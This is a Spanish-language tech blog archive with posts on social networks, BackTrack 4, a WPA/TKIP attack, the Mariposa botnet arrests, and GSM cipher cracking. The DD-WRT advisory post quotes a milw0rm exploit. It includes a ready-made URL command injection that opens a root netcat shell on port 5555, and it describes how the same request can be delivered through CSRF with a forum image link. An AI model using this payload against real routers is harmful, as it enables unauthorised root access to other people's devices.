Mostrando las entradas con la etiqueta redes. Mostrar todas las entradas
Mostrando las entradas con la etiqueta redes. Mostrar todas las entradas

lunes, 17 de mayo de 2010

Tu Mamá Quiere ser tu Amiga en Facebook


Ajá… seguro ya te pasó que de pronto un mensaje que dice “Juliana quiere ser tu amiga” y te emocionas porque es una chica nueva…o viceversa.

Jamás lo elacionas con tu mamá o tu papá porque pocas veces los llamas por su nombre, pero entonces llega el caos, cuando los mundos se colapsan y sientes como si de pronto te cayera encima una cubetada de agua fría… exacto… son tus papás que quieren que los agregues a tus amigos en Facebook… que ya se enteraron de la súper borrachera que te acomodaste el fin pasado, cuando se supone que estabas viendo una pelicula en casa de “alguien” o cenando tacos con tus cuates, jajaja. O peor aún, tú te enteras de las hazañas de tu mamá o de la novia nueva de tu papá.

Cuando el sitio de compras en línea Retrevo preparó una encuesta para el Día de las Madres respecto a la conducta de los padres y sus prácticas en redes sociales, descubrieron que casi la mitad (48%) de los padres agregan a sus hijos como amigos en Facebook. Admitieron además que es “un poco raro” en ocasiones, cuando siguen las actualizaciones, jajaja. Pero por supuesto, la mayoría de adolescentes fácilmente exluyen a sus papás usando las opciones avanzadas de privacidad que ofrece Facebook.

Retrevo también preguntó cuál es la edad que consideran apropiada para que sus hijos abran una cuenta en Facebook o MySpace. 26% dijo que arriba de 18 años, 36% entre 16 y 18, 30% dijo que entre 13-15 y sólo 8% dijo que menos de 13 años.

Otro dato curioso es que 12% le han prohibido a sus hijos el uso de redes sociales como castigo.

Vía: Mashable

lunes, 5 de abril de 2010

Descarga y tutorial de BackTrack 4 Final



La distribución por excelencia para la auditoria de seguridad ya tiene nueva versión, se trata de BackTrack 4 corrigiendo los errores y problemas que se fueron reportando en versiones anteriores, viene con el núcleo actualizado con la versión 2.6.30.9 más de 300 herramientas muchas de ellas no venían en versiones anteriores y un soporte mucho mayor para el hardware especialmente para las tarjetas inalámbricas.

Los desarrolladores han dicho que esta era la mejor de las distribuciones con diferencia después de 18 meses de trabajo. Se puede instalar en el disco duro, aunque es una distribución que mucha gente tan solo la quiere en LiveCD ya que solo la usa en momentos puntuales como puede ser para la auditoría de redes inalámbricas, de hecho muchos únicamente conocen AirCrack-ng pero hay que decir que esta distribución tiene mucho más.

 Descarga Backtrack 4.


domingo, 7 de marzo de 2010

Un nuevo ataque a WPA/TKIP


Desde que a primeros de noviembre de 2008, Erik Tews y Martin Beck abrieran la caja de Pandora demostrando la viabilidad de capturar información enviada desde un router protegido con WPA/TKIP, se han ido sucediendo pequeños avances en las técnicas utilizadas en dichos ataques yendo desde la inyección de un mayor número de paquetes maliciosos (tal y como se demostró en un paper publicado por unos estudiantes de la universidad de ciencia y tecnología de Noruega en la NorSec Conference celebrada a mediados de octubre de 2009) hasta el último ataque conocido en el que, Matin Beck, vuelve a la carga con un nuevo ataque (PDF) que, gracias a un refinamiento de la técnica utilizada, permite inyectar no solamente un mayor número de paquetes, sino que estos, pueden contener más información.

Haciendo memoria

Recordemos que, TKIP (Temporary Key Integrity Protocol), es una variante de WEP. El hecho de que inicialmente WPA utilizara este sistema -frente al más seguro AES- se debe, simplemente, a una cuestión económica.

En la mayoría de los casos, un router que soportase el protocolo WEP podría ser actualizado por software para soportar el protocolo WPA/TKIP pero, probablemente no a WPA/AES pues, este último, es computacionalmente más exigente que el primero y, por tanto, sería necesario una actualización del hardware -normalmente mediante un cambio de router- con el coste que ello implicaría.

De todas formas, TKIP si que supone un pequeño avance frente a WEP pues, aparte del vector de inicialización del paquete presente en el protocolo WEP (los conocidos como IVs), se utiliza una clave de sesión que, convenientemente "mezclada" con el vector mencionado anteriormente, impide utilizar los ataques conocidos en la actualidad para WEP ya que cada uno de los bytes de un paquete, depende tanto del vector de inicialización como de la clave de sesión. Además de esto -y para evitar ataques basados en la fragilidad de la protección por CRC32 utilizado en WEP-, TKIP implementa dos medidas adicionales: un Message Integrity Check (MIC) de 64 bits incluido en cada paquete a transmitir conocido como "MICHAEL", y un contador de secuencia (TSC) diseñado para asegurar el orden de recepción de los paquetes.

La propuesta inicial de Erik y Martin se basaba en utilizar una variante del ataque Chopchop que describimos en su forma original (orientado al ataque de redes cifradas con WEP) a continuación:

El ataque Chopchop original

Este procedimiento permite a un atacante descifrar los últimos n bytes de información de un paquete mediante el envío de una media de n * 128 paquetes al punto de acceso. La idea se basa en lo siguiente:

En redes protegidas con el protocolo WEP, antes de ser cifrados, los paquetes son modificados de tal forma que se añade un CRC32 conocido como ICV al final del contenido del paquete. A pesar del cifrado posterior, es posible averiguar el valor del último byte de datos del paquete eliminando dicho byte del paquete (truncando el paquete) utilizando una característica presente en la mayoría de los puntos de acceso: si reciben un paquete correcto de un cliente no autenticado, el punto de acceso genera un error, pero, si reciben un paquete con un checksum incorrecto, ese paquete es, sencillamente, descartado. Dado que se ha eliminado un byte basta con mandar a lo sumo 256 paquetes (de media, 128) para averiguar el valor del byte elminado. Una vez conocido el valor del último byte de datos se puede realizar la misma operación con bytes precedentes tantas veces como bytes queramos descifrar.

Contramedidas implementadas en WPA/TKIP

Como se ha comentado anteriormente, TKIP implementa dos contramedidas para evitar ataques como el descrito arriba:

* Si se recibe un paquete con un ICV erroneo, se asume que se ha producido un error en la transmisión y el paquete es descartado. Si, por contra, el ICV es correcto -pero la verificación del MIC fallase-, se consideraría que se está produciendo un ataque y, el punto de acceso, respondería enviando un MIC failure report frame. Si se producen más de dos errores en la validación del MIC en un intervalo de menos de 60 segundos se corta la comunicación y se renegocian todas las claves tras un periodo de penalización de 60 segundos.

* Si un paquete es recibido correctamente -su ICV y su MIC son correctos- se actualizará el contador TSC incrementándose en una unidad. En caso de que el TSC fuese inferior al valor del contador (el paquete habría sido recibido en un orden incorrecto), este sería descartado sin mayores consecuencias.

A pesar de todas estas contramedidas el uso del ataque Chopchop sique siendo viable con TKIP simpre y cuando se haga teniendo cuidado de no "disparar las alarmas".

La cuestión es ¿qué ganamos consiguiendo averiguar los últimos bytes de un paquete cifrado?. En principio podría parecer que la información obtenida es tan pequeña que no tiene ninguna utilidad práctica, sin embargo, pronto veremos que esto no es así.

Atacando WPA

Para empezar, es necesario que el router en el que se ejecute el ataque tenga habilitado QoS de forma que existan varios canales (según la especificación, ocho) por los que transmitir pues, dado que cada canal tiene un contador distinto para el TSC -y el tráfico normalmente siempre circula por el canal 0-, es posible inyectar paquetes con TSCs "bajos" por los siete canales normalmente inactivos sin "levantar sospechas". Es posible por tanto enviar paquetes modificados a aquellos canales con un contador TSC bajo teniendo cuidado, eso si, de no enviar más de dos paquetes con un MIC incorrecto en el intervalo de un minuto.

Supongamos que nos enfrentamos con una red Wi-Fi protegida con WPA/TKIP y que utiliza IPv4 y de la que conocemos el rango de direcciones utilizado (p. ej. 192.168.1.0/24). Adicionalmente, y como hemos visto anteriormente, el router deberá tener activado el QoS y el periodo de regeneración de las claves de la red deberá ser alto (p. ej. 3600 segundos).

Dado este escenario (bastante realista para muchas de las redes desplegadas actualmente), para atacar dicha red sería necesario capturar tráfico hasta detectar un paquete ARP (facilmente distinguible del resto en base a su longitud característica).

Haciendo un inciso -y aunque no es importante para explicar el ataque- es interesante señalar que, en una red Wi-Fi, aunque la comunicación esté cifrada, las direciones MAC tanto origen como destino aparecen en claro y los paquetes son enviados siempre a la dirección de broadcast de la red.

En un escenario como el descrito, se conoce la práctica totalidad del contenido de un paquete ARP, quedando por averiguar el último byte de las direcciónes IP origen y destino, los 8 bytes del MIC y los 4 del checksum ICV. El MIC y el ICV conforman, por tanto, los últimos 12 bytes del paquete.

Teniendo en cuenta que no podemos mandar más de dos paquetes con un MIC incorrecto en el intervalo de un minuto -aunque si que podemos mandar tantos paquetes con un ICV incorrecto como queramos hasta "acertar" pues, siendo incorrectos, serán descartados sin más (sin alterar el valor del TSC del canal) necesitaremos alrededor de 12 minutos para averiguar los 12 bytes que conforman el MIC y el ICV y un par más si queremos averiguar también las direcciones origen y destino del paquete.

Una vez recuperado el MIC y el ICV de un paquete, el atacante puede recuperar la clave utilizada para generar el MIC de dicho paquete -el algoritmo MICHAEL no fue diseñado para ser una función de un solo sentido y es igual de eficiente ejecutarlo "hacia atrás" que "hacia delante"- y, desde ese momento, hasta la resincronización de claves, pueden generarse paquetes "firmados" con la clave MIC obtenida y cuyos 4 bytes ICV correctos podrán averiguarse mediante un ataque Chopchop.

En esta forma, el ataque únicamente permite el envío de tráfico que pueda hacer saltar IDSs que trabajen a nivel de IP o, si el usuario está conectado a Internet, se podría provocar la fuga de información rutando tráfico hacia una máquina externa mediante respuestas ARP falsas.

Por último, a pesar de que con este ataque no es posible descifrar los paquetes de respuesta del cliente transmitidos via Wi-Fi, sería posible obtener dichos paquetes a través de la conexión a Internet mediante la técnica de ARP spoofing descrita anteriormente.

Mejoras introducidas en el nuevo ataque

Una vez aclarado el funcionamiento del ataque original a WPA veremos las novedades aportadas por el nuevo ataque.

La principal mejora es el aumento significativo de información que es posible inyectar en la red pues, con el ataque anterior, en la práctica solamente era posible enviar 28 bytes de información por cada paquete descifrado.

La idea en la que se basa esta mejora es la de la fragmentación de paquetes. La especificación 802.11 permite fragmentar un paquete hasta en 16 partes, sin embargo, TKIP impide reutilizar el keystream de un vector de inicialización dado en más de un fragmento, por lo que es necesario disponer de al menos 16 keystreams distintos para poder transmitir estos. Dado que el ataque explicado anteriormente precisa de 15 minutos para obtener un paquete ARP completo no sería viable utilizar dicho método para llevar a la práctica nuestra idea.

Con el fin de conseguir nuevos keystreams debemos forzar la generación de nuevos paquetes en la red de los cuales conozcamos la mayor cantidad de información. Los paquetes perfectos para esto son los TCP-SYN que, enviados mediante IP spoofing -haciéndonos pasar por el punto de acceso- a un puerto TCP abierto en el cliente, provocarán la respuesta TCP-SYN/ACK a la que el propio punto de acceso, responderá con un paquete TCP-RST generando un nuevo IV dirigido hacia el cliente y que podremos capturar.

Para llevar a cabo esta idea debemos ser capaces de generar un paquete TCP/IP que consistirá en: 8 bytes de cabecera LLC, 20 bytes de cabecera IP y otros 20 de cabecera TCP lo cual nos da 48 bytes de longitud para la MSDU y, a esto, hay que añadirle los 8 bytes del MIC que hacen en total 56 bytes. Asumiendo que disponemos de 8 bytes de keystream para cifrar información, utilizando los siete canales restantes (proporcionados por el QoS del punto de acceso) seremos capaces de cifrar 7 x 8 = 56 bytes por lo que, dado que el envió de un TCP-SYN genera un único TCP-RST, con este método nunca podríamos obtener nuevos bytes de keystream "utilizables".

Necesitamos, por tanto, encontrar una forma de conseguir un mayor número de bytes de keystream que nos permitan inyectar tráfico extra en la red.

Casualmente, muchos sistemas Linux -como los que usan una gran cantidad de routers ADSL- generan paquetes TCP-RST con valores concretos en ciertos campos que nos permitirían obtener un mayor número de bytes de keystream a partir de los paquetes TCP-RST capturados.

Por ejemplo, el ID de dichos paquetes suele ser 0 -por lo que se obtendrían dos bytes extra- de los dos siguientes campos, el byte en el que se indica la fragmentación sería también cero -al no haber más fragmentos- y el de los flags sería, o bien cero, o 0x40 para indicar que no se debe fragmentar el paquete; el siguiente byte -el TTL- probablemente será 0x40 pues es el valor utilizado por defecto en Linux; así mismo, el byte para indicar el protocolo será 0x06 indicando que se usa TCP, las IPs de origen y destino y los puertos TCP serán conocidos así como el número de secuencia que será igual al original incrementado en uno, ...

Siguiendo de forma similar con el resto de los campos del paquete podríamos llegar a obtener hasta 60 bytes de keystream por cada uno de los siete canales libres sin necesidad de fragmentación.

Suponiendo que podamos conseguir todos los requisitos expuestos anteriormente, seríamos capaces de generar 60 nuevos bytes de keystream a la velocidad de la conexión wireless. Incluso, en caso de que el punto de acceso no cumpliese con estos requisitos, si la red a atacar tuviese conexión a Internet y no estuviese filtrado el establecimiento de conexiónes hacia máquinas de Internet, sería viable hacer spoofing de una IP de un sistema externo en el cual tuviésemos control de los paquetes TCP-RST generados lo cual permitiría generar nuevos bytes de keystream aunque, eso sí, la velocidad de generación quedaría limitada a la velocidad de descarga de dicha conexión.


Conclusiones

En resumen, y como se ha comentado inicialmente, este ataque permitiría extraer mucha más información de una red protegida con WPA/TKIP consituyendo un serio problema de seguridad en cuanto a la fuga de datos que ello supone.

Aunque en la práctica este ataque es complejo dado que se necesita la confluencia de un gran número de factores -la red debe estar cifrada con WPA/TKIP que poco a poco va cayendo en desuso, el atacante debe estar a una distancia que le permita inyectar paquetes y el punto de acceso debe tener activado QoS y estar basado en Linux- La forma de evitar este problema es tan simple como utilizar WPA/AES a la hora de configurar una red Wi-Fi.

Dejamos para una futura entrada el analizar el otro avance presentado que, en resumen, es un ataque al código de integridad del mensaje (MICHAEL) que permitiría insertar información en un paquete con datos y MIC desconocidos consiguendo con ello el objetivo de poder descifrar todo el tráfico dirigido hacia el cliente.

Fernando Braquehais
S21sec. e-crime
http://blog.s21sec.com/2010/03/un-nu...Blog+S21sec%29

España inicia una serie de arrestos a los operadores de una poderosa red zombi


La Guardia Civil española ha arrestado a tres individuos acusados de controlar la red zombi Mariposa, que tenía bajo su control casi 13 millones de ordenadores infectados.

Los delincuentes activaron la red en diciembre de 2008 y un grupo de expertos la desactivó en diciembre de 2009, aunque aún existen ordenadores infectados. Algunos expertos afirman que los 12,7 millones de ordenadores zombi que llegó a controlar la convierten en una de las redes más grandes del mundo.

Mariposa infectaba los ordenadores vulnerables con un programa troyano que registraba las teclas que pulsaba el usuario. Esto le permitía robar los datos privados de los internautas, como sus números de tarjeta de crédito y contraseñas, y ponerlos en manos de los delincuentes.

Se cree que entre las víctimas de la red zombi se encuentra más de la mitad de la lista de las 1.000 empresas más poderosas según la revista Fortune y 40 de los principales bancos del mundo.

Un grupo informal de expertos en seguridad se unió para crear el Mariposa Working Group y combatir esta amenaza. En diciembre del año pasado, los miembros del grupo lograron derrumbar los servidores de comando y control de Mariposa, y enviaron información sobre la red a la Guardia Civil española y a las autoridades estadounidenses para ayudarles a identificar a los criminales y llevarlos ante la justicia.

Las autoridades lograron recolectar suficiente evidencia para arrestar en enero al primer sospechoso. Además, el Grupo de Delitos Telemáticos de la Guardia Civil arrestó a dos sospechosos más la semana pasada. No se ha revelado la identidad de los acusados, pero sí se revelaron los alias que utilizaban en Internet y sus respectivas edades: “netkairo”, 31; “jonyloleante”, 30; y “ostiator”, 25.

Los tres sospechosos son ciudadanos españoles, y la policía aseguró que no encajan con el típico perfil de los delincuentes virtuales, pues tienen poco conocimiento de informática. Por esta razón, los criminales tuvieron que solicitar la ayuda de otros piratas para construir y operar la red zombi.

Los acusados enfrentan una condena de hasta seis años de prisión. Además, es muy probable que este sea sólo el principio de una serie de arrestos a los operadores de esta red criminal.

Fuente: viruslist


¿Quiénes son Ostiator, Jonyloleante y Netkairo?

Un vasco, un gallego y un murciano, de entre 25 y 31 años, compraron en el mercado negro un programa "malicioso" que mediante técnicas tipo troyano les permitía acceder a millones de ordenadores en 190 países. Son Netkairo, residente en Balmaseda (Vizcaya) 31 años. Ostiator, de Santiago de Compostela, 25 años. Y Johnyloleante, vecino de Molina de Segura (Murcia), 30 años. Bajo estos alias se escondían los administradores de la red de ordenadores zombies (controlados a distancia) más grande conocida. Controlaban 13 millones de ordenadores y traficaban con sus datos personales y bancarios.

El jefe máximo de la red responde a las iniciales F.C.R., de 31 años, y se hacía llamar Netkairo o Hamlet1917 y fue detenido en Balmaseda (Vizcaya). Las iniciales de Ostiator, compostelano, son J. B. R., de 25 años, y el tercer detenido, J.P.R., de 30 años, usaba el nick de Johny Loleante y residía en Molina de Segura, en Murcia. Los tres se encuentran en libertad con cargos tras haber sido detenidos no por haber diseñado esta red cibercriminal, sino por utilizarla, aunque no llegaron a realizar el enorme ataque informático que su equipo permitía.

El grupo infectó a alrededor de 200.000 equipos sólo en España, y obtenía sus ganancias alquilando la red a otros delincuentes y a través del fraude publicitario: redireccionaban los ordenadores infectados a publicidad de sus propias páginas, cobrando grandes cantidades de Google Adsense.

Entre las víctimas están más de la mitad de las mil mayores empresas del mundo, a cuyos datos accedían aprovechando la vulnerabilidad del Internet Explorer, o también por memórias USB, del envío de enlaces infectados a través de por mensajería instantánea infectados.

Pero, aunque esta red, llamada Mariposa, es la mayor de las desactivadas hasta ahora, un portavoz del departamento de Justicia norteamericano advierte que "sólo se trata de la punta del iceberg". El sumario está siendo instruído por el juez Garzón de la Audiencia Nacional.

Netkario, Ostiator y Johnyloleante eran los alias que empleaban los tres arrestados, que vivían con todo tipo de lujos gracias a los ingresos que obtenían con el fraude publicitario y alquilando la red a ciberdelincuentes. Además, también podrían haber realizado fraudes de forma directa, tal y como denuncia públicamente en su momento un cibernauta sobre una estafa en internet que podría haber cometido Ostiator con su otro nick, hamlet1917.

Los detenidos no diseñaron la red zombie. Ellos sólo compraron el programa en el mercado negro para ganar dinero administrándolo desde sus casas.

En este caso, sin embargo, los tres jefes de la red no eran expertos en informática. ¿Quiénes eran, en realidad? Insomnia ha rastreado sus nicks en Google y esto es lo que ha encontrado:

Ostiator: "Creo que tenía la mejor colección porno de La Coruña"
Gondar_f, moderador del foro de Hackhispano, habla de Ostiator, al que conoce por comentarios de amigos:

Ostiator era gallego, yo no lo conocia personalmente, pero si me tienen hablado de él un colega de Villagarcía que parece ser que es amigo. Dice que era la repolla, controlaba de todo (SO, programación, viri...) y que tenia dinero a manos llegas con un pequeño negocio en la red que gestionaba (¡¡mira cuál era!!). Además parece ser que tenia la mejor colección porno de La Coruña. Ese nick (Ostiator o hamlet1917) no creo que sea muy común, supongo que es del que me hablaban. El lunes que viene voy a verlo y le voy a decir a ver si es su amigo al que pillarón.

Jonyloleante: No lo conoce nadie en su pueblo
Publicado en la edición online de La Verdad, un pequeño artículo habla del sorpresón que se han llevado los vecinos de Jonyloleante:

«Sólo salimos en las noticias 'pa' cosas malas», comentaba ayer más de un vecino de Molina de Segura a las pocas horas de trascender que el tercer detenido de la red Mariposa reside en esta localidad. Los molinenses aún tienen presente que el pasado fin de semana fueron portada dos de sus vecinos 'cazados' por un radar a 237 y 233 kilómetros por hora. Todo un récord. Ayer le tocaba el turno al tal Jonhy Loleante, un 'nick' tras el que está J.P.R. de 30 años. «¡Menudo apodo ha elegido el liante éste!», señalaba otro vecino.

¿Pero quién conoce a Loleante? Parece que nadie. A algunos gerentes de tiendas de informática les sonaba el nombre, pero en realidad nadie ha podido identificarlo, ni siquiera las fuentes policiales consultadas en el municipio.

Lo que sí tienen claro es que Loleante es «un verdadero hacker, pues el que lo es realmente no lo va diciendo», señala un informático. Sin embargo, no se trata de un gran experto porque, según la policia, Johny y sus dos socios no diseñaron la red, sino que la compraron. Los vecinos manifestaban gran sorpresa conforme iban conociendo más detalles, sobre todo por el alcance internacional de la red. «Parece mentira que un zagal del pueblo se meta en esos berenjenales», decía un hombre mayor del Llano. Eso sí, la gente también tiene claro que quien la hace, la paga, aunque sea del pueblo. «Lo mismo tenían mis datos», comentaba el regente de una tienda de informática.

Netkairo: "Intentó estafarme usando Paypal: ni aún en España puedes fiarte"
Un cibernauta denuncia un intento de estafa de Netkairo:

Hoy han intentado estafarme con un pago realizado por Paypal, la cuenta era perteneciente a un usuario con domicilio en Estados Unidos y el estafador queria que le entregara el paquete en España.
Nunca hubiera aceptado mandarlo a una direccion que no es la misma que la registrada en Paypal, pero de todas formas el propietario de la cuenta ha impugnado el pago porque se habia dado cuenta que habian usado su cuenta sin autorización.

Fuente: insomnia

sábado, 27 de febrero de 2010

Facebook obtiene la patente de los "feeds" de noticias en las redes sociales


Los Ángeles (EE.UU.), 26 feb (EFE).- La compañía californiana Facebook, líder mundial en el mercado de las redes sociales de internet, obtuvo la patente de los servicios de distribución de noticias en redes sociales conocidos como "feed", informaron hoy los medios estadounidenses.

La patente fue reconocida a esta plataforma digital por "proveer dinámicamente un servicio de noticias sobre un usuario de una red social" y responde a una solicitud presentada por la empresa en 2006.

El sistema de "feed", que permite compartir automáticamente con los "amigos" virtuales las actualizaciones de los miembros de las redes sociales, se ha convertido en una herramienta común en la web y es clave en el funcionamiento de otras redes como Twitter o LinkedIn.

El derecho adquirido por Facebook sobre la propiedad del "feed" podría abrir la puerta a conflictos legales con sus rivales, si bien no ha trascendido si la patente se refiere al sistema especifico empleado por la empresa californiana o es extrapolable al que utilizan otras compañías.

Desde que se pidió la patente, en 2006, hasta ahora el funcionamiento de los "feed" ha sufrido diversas variaciones.

Algunos medios informaron de que la estrategia de Facebook, lejos de perseguir iniciar una batalla judicial para reclamar derechos sobre el uso de esta tecnología en internet, tiene una finalidad defensiva: evitar que en el futuro otros puedan conseguir la propiedad sobre los "feed" y ser ella la demandada.

miércoles, 20 de enero de 2010

La red 3G GSM ha sido vulnerada, asi es hay un fallo de seguridad



Si hay algo que ha sido relevante este año en el CCC, han sido los ataques a GSM, y entre ellos la gran noticia ha sido el anuncio de la rotura de su cifrado en la charla de Chris Paget (con tacones de plataforma rojos) y Karsten Nohl.

La charla tenía en realidad dos partes, cada una sobre una de las dos principales debilidades de la red GSM, que es incluso más grande que Internet en términos de tamaño y nodos conectados.

En la primera parte, acerca de los ataques que posibilita el hecho de que el teléfono no autentique a la red y por tanto, se pueda poner una estación base emulada que haga creer a cualquier teléfono que se está conectando a la red de verdad y capturar todo su tráfico. Estos ataques tienen el inconveniente de que al ser activos, si alguien los busca, encontrará al atacante, a pesar de que normalmente, nadie los busca.

En realidad, las herramientas mostradas (el "Universal Software Radio Peripheral", USRP, junto con un software denominado OpenBTS que emula la parte radio de la red) son todavía capaces de ataques bastante rudimentarios, limitados a la captura de los IMSI, un número identificador del teléfono, que no es visible al usuario y que puede ser utilizado para ataques de denegación de servicio (no es posible suplantarle sin tener acceso físico al SIM, y aún así para suplantar a un usuario se requiere poner el SIM en un microscopio electrónico y dejarlo prácticamente inutilizable).

Pero lo que sí muestra es la evidencia de que en ausencia de pruebas de seguridad, los teléfonos existentes hoy en día tienen una gran cantidad de defectos en el software, y una gran vulnerabilidad a ataques:

  • Por ejemplo, aunque lo normal es que los iPhones no se conecten al OpenBTS, en USA se encontraron uno que insistía en conectarse a ellos, a pesar de que emitían como una red de prueba que no existe, emitían en una banda que en USA no se usa y usando la mínima potencia posible.
  • Otros teléfonos en China, una vez se habían conectado a OpenBTS cambiaban el nombre de la red, y luego ya no lo cambiaban al correcto a pesar de rearrancarlos completamente.
  • Otra vez por error respondieron con el mensaje utilizado para desactivar los teléfonos robados en lugar de para rechazar a los teléfonos y que no se conectasen a la red, lo cual daba lugar a múltiples estados con diversos estados de irrecuperabildad según los teléfonos (p.e., el iPhone requería desconectar la batería... una operación que en Apple requiere una visita al servicio técnico o desmontarlo totalmente).
Por último, también ha puesto en evidencia que aunque el capturador de IMSIs es una herramienta muy grosera y fácilmente detectable, ningún teléfono dispone de ningún mecanismo para saber que está conectado a un equipo de acceso impostor, y todos ocultan al usuario si debido a un ataque el teléfono está haciendo la llamda sin usar cifrado y por tanto la privacidad está comprometida.

La segunda parte de la charla ha tratado el tema mucho más peliagudo de los ataques pasivos (escuchando únicamente), en el cual se ha explicado cómo es posible descifrar el código de cifrado AS5/1, el que es utilizado en GSM para proteger la privacidad de las llamadas.

La motivación de Karsten para desarrollar este ataque y hacerlo público, es que el cifrado de GSM ha aparecido roto en muchos artículos de seguridad, pero en ninguno se había llegado hasta las últimas consecuencias, haciendo públicas las herramientas para descifrar el algoritmo..

El protocolo de cifrado AS5/1, tiene una clave relativamente pequeña (64 bits, igual que el DES que ya casi nadie usa), lo que lo hace vulnerable a un ataque de precomputación, en el que se calculan todos los resultados de cifrar un determinado dato con cada una de las claves. Lo que hasta ahora impedía hacer este ataque es que el tamaño de la tabla precomputada es de 1 Petabyte (y por tanto difícil de ocultar) y precomputar la tabla llevaría 100.000 años de una CPU moderna. Lo que Karsten ha hecho es encontrar una manera de precomputar las claves más sencilla y de almacenar la tabla de modo más compacto mediante tablas de cadenas arco iris modificadas.

Para la parte de computarlo más rápido, han utilizado tarjetas gráficas, que son muy eficientes para procesos en paralelo, por el cual son capaces de calcular 400 claves a la vez, además han hecho que cada cálculo procese 4 bits de cada vez, con lo que después de todo, sólo han hecho falta 3 meses de computación en 40 ordenadores con tarjetas gráficas Nvidia para completar el resultado. Aunque usando FPGAs podrían hacerlo más rápido, la escasez de buenos programadores de FPGA les ha hecho renunciar a ello.

Para la parte de comprimir los resultados en tablas de arco iris, Karten ha entrado en más detalle técnico, en el que ha explicado que el mecanismo básico de una tabla de cadenas es tomar un punto de entrada, aplicarle el algoritmo con la clave varias veces hasta llegar a un punto que se almacena en la tabla. Cuando se tiene un dato de entrada, se le aplica el mismo algoritmo (en este caso el algoritmo que desde el estado interno produce el texto cifrado) hasta encontrar un punto que se encuentre en la tabla, una vez encontrada la cadena correcta, se parte desde el principio y el dato anterior al resultado escuchado es el estado interno necesario. Esto se ve mejor en este diagrama, procedente de su presentación.



Sobre este algoritmo básico, han aplicado dos mejoras:
  • Por un lado, para no tener que mirar en el disco duro cada vez (el equipo de descifrado tiene de 16 a 32 memorias flash USB para almacenar los datos con una latencia razonable) cada vez que se ejecuta el algoritmo si se ha llegado al final de la cadena, sólo se almacenan como finales de cadena valores específicos (p.e. con la segunda mitad a cero). De este modo, sólo cuando el resultado de una cadena es un valor específico se mira en disco duro.
  • La segunda mejora es el principio de las tablas "arco iris", que es utilizar un algoritmo levemente diferente (en vez de usar siempre K) en cada paso de la cadena, de modo que la posibilidad de que dos cadenas colisionen produciendo el mismo valor disminuye mucho.
En la solución empleada, ambos se combinan para tener un cambio de algoritmo cada vez que se encuentra cada uno de los 32 valores distinguidos coon los últimos 15 bits a cero. Con esto, ya tienen unas tablas que con 2 TB tienen un 99% de probabilidades de descifrar una llamada si se dispone de todas las claves y un 50% si sólo se consiguen las claves más obvias.

El proyecto está en la fase en la que irá progresando rápidamente, a medida que empiezan a probar van descubriendo más tramas que usar para atacar, y a disminuir el tamaño de las tablas.

La asociación GSM, ha publicado una nota de prensa señalando todo lo que les falta al equipo para poder ejecutar el ataque sobre una llamada que use "frequency hopping": hardware para sintonizar las frecuencias y un software para seguir las diferentes frecuencias. Ellos piensan hacerlo con USRP2 (que es capaz de capturar 25 MHz completos) y con openBTS, aunque todavía no lo tienen listo porque capturar 25 MHz genera demasiados datos y hay que filtrarlo.

Por último, la recomendación para mitigar este ataque, es deshabilitar la cifra A5/1 y pasar a la A5/3 (sólo un operador, SFR, ha hecho algo por ahora), que todavía es demasiado compleja para ser atacada (aunque en una , aunque esto no tapa todos los agujeros porque un ataque activo podría permitir capturar pasivamente una llamada realizada con A5/3, luego activar el capturador de IMSI para obligar al teléfono a negociar con A5/1 y esto permitiría recuperar la clave, ya que el teléfono reutiliza secretos entre llamadas consecutivas y averiguar la clave de la segunda llamda permite conocer la de la primera.

martes, 28 de julio de 2009

Problema de seguridad en el firmware para routers DD-WRT

Se ha descubierto un error de validación de parámetros de entrada en el interfaz web de DD-WRT v,24. Esto podría ser usado por un atacante remoto sin autenticar para eludir restricciones a través de una URL especialmente manipulada. Este error permite ejecutar comandos del sistema con privilegios de "root".

DD-WRT es un firmware no oficial para routers como Linksys, D-Link y La Fonera, entre otros. Está traducido a más de diez idiomas y es compatible con IPv6, soporta WIFI con distintos tipos de cifrado, permite montar VPN y hasta tiene una versión con VoIP, entre otros tantos servicios típicos de un router.

Este fallo se ha publicado en forma de exploit con todo lujo de detalles (incluso existe un vídeo). El exploit permite lanzar una consola por el puerto 5555 del router.

Por suerte, el interfaz solo está habilitado para la red local salvo que se active para acceder a él de forma remota. La vulnerabilidad ha sido reconocida y ya existe un parche para solucionar este fallo.

Más Información:

Web oficial de DD-WRT
http://www.dd-wrt.com/dd-wrtv3/index.php

Descarga del parche
http://www.dd-wrt.com/dd-wrtv2/down.php

This is a remote root vulnerability in DD-WRT's httpd server. The bug exists
at the latest 24 sp1 version of the firmware.

The problem is due to many bugs and bad software design decisions. Here is
part of httpd.c:

859 if (containsstring(file, "cgi-bin")) {
860
861 auth_fail = 0;
862 if (!do_auth
863 (conn_fp, auth_userid, auth_passwd, auth_realm,
864 authorization, auth_check))
865 auth_fail = 1;


......... (snip)............

899
900 }
901 exec = fopen("/tmp/exec.tmp", "wb");
902 fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method);
903 if (query)
904 fprintf(exec, "/bin/sh %s/%s/tmp/shellout.asp");

........... (snip)..........

926 if (auth_fail == 1) {
927 send_authenticate(auth_realm);
928 auth_fail = 0;

------------

3) issue 3: httpd runs as root :)



Now let's sum up (1), (2) and (3). Any unauthenticated attacker that can
connect to the management web interface can get easily root on the device via
his browser with an URL like:

http://routerIP/cgi-bin/;command_to_execute

There is a catch though: whitespaces break it. Anyway, they can be easily
replaced with shell variable like $IFS. So, getting root shell at 5555/tcp
becomes as easy as typing this in your browser's url bar:

http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh


Voila (pretty old-school, eheh). Here is some (poor) video demonstrating the
problem:
http://www.youtube.com/watch?v=UhDcXCVFrvM


Fortunately, httpd by default does not listen on the outbound interface.
However, this vulnerability can be exploited via a CSRF attack (the dd-wrt
device's owner does not even need to have an authenticated session on the web
UI which is bad, bad). However, a base authentication dialog will appear. In
IE even this can be supressed, see this one:

http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/

Unlike the already documented CSRF vulnerability (
http://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated
session. This means someone can even post some crafted [img] link on a forum
and a dd-wrt router owner visiting the forum will get owned :)


A weird vulnerability you're unlikely to see in 2009 :) Quite embarrassing I
would say :)


Thanks krassyo at krassyo.info for his support :)


Leka vecher :)

# milw0rm.com [2009-07-20]

domingo, 24 de mayo de 2009

Ataque Man-in-the-middle


En respuesta a Ricardo Dos Santos,
